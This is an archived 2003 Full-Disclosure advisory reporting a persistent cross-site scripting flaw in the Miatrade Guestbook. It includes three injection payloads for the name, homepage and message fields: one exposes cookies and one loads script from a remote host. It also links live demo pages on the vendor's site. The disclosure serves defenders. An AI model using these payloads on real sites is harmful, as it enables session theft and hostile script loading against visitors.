[Full-Disclosure] Miatrade Guestbook - Persistant XSS

From: morning_wood (se_cur_ityat_private)
Date: Sun Aug 24 2003 - 15:12:15 PDT

Next message: Alex Russell: "[Full-Disclosure] Re: Popular Net anonymity service back-doored"

Previous message: Bernhard Kuemel: "[Full-Disclosure] Re: Popular Net anonymity service back-doored"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-021 exploitlabs.com Advisory 021
------------------------------------------------------------------
                          -= Miatrade Guestbook =-



Aug 20, 2003
Donnie Werner
morning_woodat_private


Product:
--------
Miatrade guestbook
http://www.miatrade.com

http://www.google.com/keyword/Miatrade+Guestbook


Vunerability:
----------------
1. persistant XSS


Description of product:
-----------------------
"Miatrade Guestbook gives you the ability to gather information
 from your visitors. They can post a public message that
 may include: Name, E-mail, url, Home page and Comments
 about your site.
Miatrade guestbook let's you keep in touch with who's visiting
 your site and are a great way to make your site more
 interactive and keep visitors coming back."


VUNERABILITY / EXPLOIT
======================

Miatrade guestbook does not filter HTML code from user-supplied
 input. A remote user can create a specially crafted URL that,
 when loaded by a target user, will cause arbitrary scripting
 code to be executed by the target user's browser. The code will
 originate from the site running the Miatrade guestbook software
 and will run in the security context of that site.


persistant XSS rendered in fields:

[name] - <script>alert("You are vunerable to xss")</script>

[homepage] - <script>document.write(document.cookie)</script>

[message] - <script language="JavaScript"
src="http://someremote-url/nasty.js" type="text/javascript"></script>

live examples:

demo - sign

http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi

demo - view

http://www.miatrade.com/cgi-bin/guest/view.pl?fibi



Local:
------
no

Remote:
-------
yes


Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
Concurrent with this advisory
infoat_private


Credits:
--------
Donnie Werner
co-founder / CTO
e2-labs.com
morning_wood@e2-labs.com

http://exploitlabs.com
http;//nothackers.org/about.php



Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Alex Russell: "[Full-Disclosure] Re: Popular Net anonymity service back-doored"
Previous message: Bernhard Kuemel: "[Full-Disclosure] Re: Popular Net anonymity service back-doored"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Aug 24 2003 - 15:31:03 PDT